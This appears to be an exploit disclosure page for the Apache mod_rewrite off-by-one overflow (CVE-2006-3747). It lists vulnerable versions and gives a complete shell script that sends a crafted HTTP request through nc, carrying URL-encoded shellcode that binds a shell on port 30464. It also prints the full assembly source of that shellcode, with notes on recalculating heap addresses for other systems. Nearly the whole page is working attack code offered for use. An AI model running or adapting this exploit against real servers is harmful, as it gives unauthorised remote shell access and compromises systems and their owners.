Page under construction

Exploit & info about off-by-one overflow in mod_rewrite module of Apache HTTP server

• Vulnerable Apache versions:
  * 1.3 branch: >1.3.28 and <1.3.37
  * 2.0 branch: >2.0.46 and <2.0.59
  * 2.2 branch: >2.2.0 and <2.2.3
  
  However, due to the nature of the off-by-one sensitive exploitation not all the vulnerables versions are exploitables ones. I did a successful attack on Apache 1.3.34 (Debian Sarge package).
  
  
• The Exploit (get the source):

  When I posted the original exploit in bugtraq on 2006-Aug-20 I sent the exploit as a quite long one-line :) My e-mail client wrapped the line and introduced wrong white spaces between some OPCodes of the shellcode, here a good and improved version:

  #!/bin/sh
  # Exploit for Apache mod_rewrite off-by-one.
  # Vulnerability discovered by Mark Dowd.
  # CVE-2006-3747
  # 
  # by jack <jack\x40gulcas\x2Eorg>
  # 2006-08-20
  #
  # Thx to xuso for help me with the shellcode.
  #
  # I suppose that you've the "RewriteRule kung/(.*) $1" rule if not
  # you must recalculate adressess.
  #
  # Shellcode is based on Taeho Oh bindshell on port 30464 and modified
  # for avoiding apache url-escape.. Take a look is quite nice ;)
  #
  # Shellcode address in heap memory on apache 1.3.34 (debian sarge) is at
  # 0x0834ae77 for any other version/system find it.
  #
  # Gulcas rulez :P
  
  echo -e "mod_rewrite apache off-by-one overflow"
  echo -e "by jack <jack\x40gulcas\x2eorg>\n\n"
  
  if [ $# -ne 1 ] ; then
    echo "Usage: $0 webserver"
    exit
  fi
  
  host=$1
  
  echo -ne "GET /kung/ldap://localhost/`perl -e 'print "%90"x128'`%89%e6\
  %31%c0%31%db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3\
  %01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04\
  %31%c0%89%46%10%b0%10%89%46%08%b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66\
  %b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31\
  %c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8\
  %23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76\
  %08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db\
  %cd%80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\
  %77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\r\n\
  Host: $host\r\n\r\n" | nc $host 80
  

• The Shellcode:
  
  The assembler code to generate OPCodes showed above is based on Taeho Oh bindshell and modified to bypass slash char (/) in the path of the shell (/bin/sh) and simplified, i.e: do not fork(), no short jumps, ...:

  	.section .text 
  .globl _start 
  
  _start: 
  	mov  %esp,%esi 
  	xorl %eax,%eax        
  	xorl %ebx,%ebx        
  	movl %esi,%ecx        
  	movb $0x2,%al          
  	movl %eax,(%esi)      
  	movb $0x1,%al          
  	movl %eax,0x4(%esi)   
  	movb $0x6,%al         
  	movl %eax,0x8(%esi)   
  	movb $0x66,%al        
  	movb $0x1,%bl         
  	int  $0x80             
  	movl %eax,(%esi)      
  	movb $0x2,%al          
  	movw %ax,0xc(%esi)    
  	movb $0x77,%al # 0x77 = port 30464
  	movw %ax,0xe(%esi)    
  	leal 0xc(%esi),%eax   
  	movl %eax,0x4(%esi)   
  	xorl %eax,%eax        
  	movl %eax,0x10(%esi)   
  	movb $0x10,%al        
  	movl %eax,0x8(%esi)   
  	movb $0x66,%al        
  	movb $0x2,%bl         
  	int  $0x80             
  	movb $0x1,%al          
  	movl %eax,0x4(%esi)   
  	movb $0x66,%al        
  	movb $0x4,%bl          
  	int  $0x80             
  	xorl %eax,%eax        
  	movl %eax,0x4(%esi)   
  	movl %eax,0x8(%esi)   
  	movb $0x66,%al        
  	movb $0x5,%bl         
  	int  $0x80             
  	movb %al,%bl          
  	movb $0x3f,%al        
  	xorl %ecx,%ecx        
  	int  $0x80
  	movb $0x3f,%al        
  	movb $0x1,%cl         
  	int  $0x80             
  	movb $0x3f,%al        
  	movb $0x2,%cl         
  	int  $0x80             
  	movl $0x6e696223,%eax # String #bin
  	movl %eax,(%esi)      
  	movl $0x23687323,%eax # String #sh# 
  	movl %eax,0x4(%esi)   
  	xorl %eax,%eax        
  	movb %al,0x7(%esi)    
  	movb $0x30,%al # Move 0x30 to %eax 
  	subb $0x01,%al # Subtract one: 0x2f
  	movb %al,0x4(%esi) 
  	movb %al,(%esi) 
  	movl %esi,0x8(%esi) # /bin/sh\0 placed in (%esi)
  	xorl %eax,%eax 
  	movl %eax,0xc(%esi)   
  	movb $0x0b,%al         
  	movl %esi,%ebx        
  	leal 0x8(%esi),%ecx   
  	leal 0xc(%esi),%edx   
  	int  $0x80 # Runs execve("/bin/sh", &"/bin/sh", 0x00000000);
  	xorl %eax,%eax        
  	movb $0x01,%al         
  	xorl %ebx,%ebx        
  	int  $0x80  # Runs exit(0);